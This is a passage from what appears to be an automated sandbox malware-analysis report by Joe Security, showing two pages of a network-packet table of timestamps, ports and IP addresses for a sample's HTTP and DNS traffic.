2018 20:07:47.247643948 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.247716904 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.247764111 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.247879028 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.247920036 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.248042107 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.248060942 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.248085022 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.262654066 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.262703896 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.262727976 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.262748957 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.262769938 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.262789011 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.262799025 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.264046907 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.272353888 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298043013 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298122883 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298208952 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298299074 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298338890 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298347950 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298362970 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298386097 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298408985 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298425913 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298449993 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298472881 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298496008 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298496962 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298518896 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298541069 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298563004 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298563957 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298604012 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298628092 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298651934 CEST 80 49170 160.153.137.19 192.168.2.3 Copyright Joe Security LLC 2018 Page 20 of 32

Timestamp Port Dest Port IP Dest IP Jul 11, 2018 20:07:47.298662901 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298675060 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298696995 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298717022 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298718929 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298743963 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298767090 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.298788071 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.298789978 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.302766085 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.323873997 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.323906898 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.323951006 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.323971033 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324035883 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.324110031 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324174881 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.324284077 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324306011 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324326038 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324342012 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.324347019 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324368000 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324388027 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324417114 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.324436903 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324457884 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324474096 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.324477911 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324497938 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324520111 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324548006 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.324845076 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.324898005 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.325012922 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.325037003 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.325057030 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.325058937 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.325079918 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.325100899 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.325140953 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.328186035 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.328260899 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.328285933 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.328331947 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.341097116 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.350032091 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.350119114 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:08:05.901393890 CEST 60052 53 192.168.2.3 8.8.8.8 Jul 11, 2018 20:08:05.986597061 CEST 53 60052 8.8.8.8 192.168.2.3 Jul 11, 2018 20:08:06.009627104 CEST 49172 80 192.168.2.3 94.73.145.234 Jul 11, 2018 20:08:06.062423944 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.062505007 CEST 49172 80 192.168.2.3 94.73.145.234 Jul 11, 2018 20:08:06.062952042 CEST 49172 80 192.168.2.3 94.73.145.234 Jul 11, 2018 20:08:06.115962982 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.132627010 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.132762909 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.132791996 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.132853031 CEST 49172 80 192.168.2.3 94.73.145.234 Jul 11, 2018 20:08:06.132894993 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.132946014 CEST 49172 80 192.168.2.3 94.73.145.234 Jul 11, 2018 20:08:06.133006096 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.133033991 CEST 80 49172 94.73.145.234 192.168.2.3 Jul 11, 2018 20:08:06.133065939 CEST 80 49172 94.73.145.234 192.168.2.3 Copyright Joe Security LLC 2018 Page 21 of 32

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback